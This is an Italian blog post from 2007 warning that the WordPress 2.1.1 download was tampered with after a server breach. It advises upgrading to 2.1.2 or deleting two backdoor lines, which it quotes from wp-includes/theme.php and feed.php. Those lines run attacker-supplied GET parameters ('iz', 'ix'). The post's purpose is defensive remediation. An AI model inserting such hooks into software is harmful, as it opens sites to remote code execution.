Iscriviti alla newsletter o al feed RSS per ricevere gli aggiornamenti del blog automaticamente!

 Wordpress 2.1.1 è pericoloso !



Ecco come il team di Wordpress definisce la recente versione di WP. Il motivo è semplice: qualche giorno fa un cracker ha violato alcuni dei server di worpress.org, riuscendo a modificare il pacchetto di installazione che viene normalmente scaricato: le modifiche sembrano riguardare solo un paio di files al fine di permettere un’esecuzione remota di codice php. Per risolvere il problema ci sono due alternative:

    1. Scaricare la versione 2.1.2 prontamente rilasciata dagli sviluppatori di Wordpress e procedere all’aggiornamento.
    2. Rimuovere a mano il codice malizioso (se come me non avete voglia/tempo di installare subito la nuova versione).
    Si tratta semplicemente di:
    - individuare e rimuovere dal file “wp-includes/theme.php” la seguente riga di codice: 
    if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

    - individuare e rimuovere dal file “wp-includes/feed.php” la seguente riga di codice: 

    if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }


Ti è piaciuto l'articolo? Iscriviti ora per ricevere aggiornamenti o articoli simili:
Iscriviti al feed RSS scriviti al feed RSS


Data Scritto il 6 Marzo, 2007 alle 12:06 in Sicurezza, Web
Condivisione Condividi  | Tags: , , , ,

Ancora nessun commento »

Feed RSS dei commenti di questo post. TrackBack URI

Lascia un commento

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Nothing2Hide © 2006 All rights reserved.

License | Disclaimer

Chiudi
Invia e-mail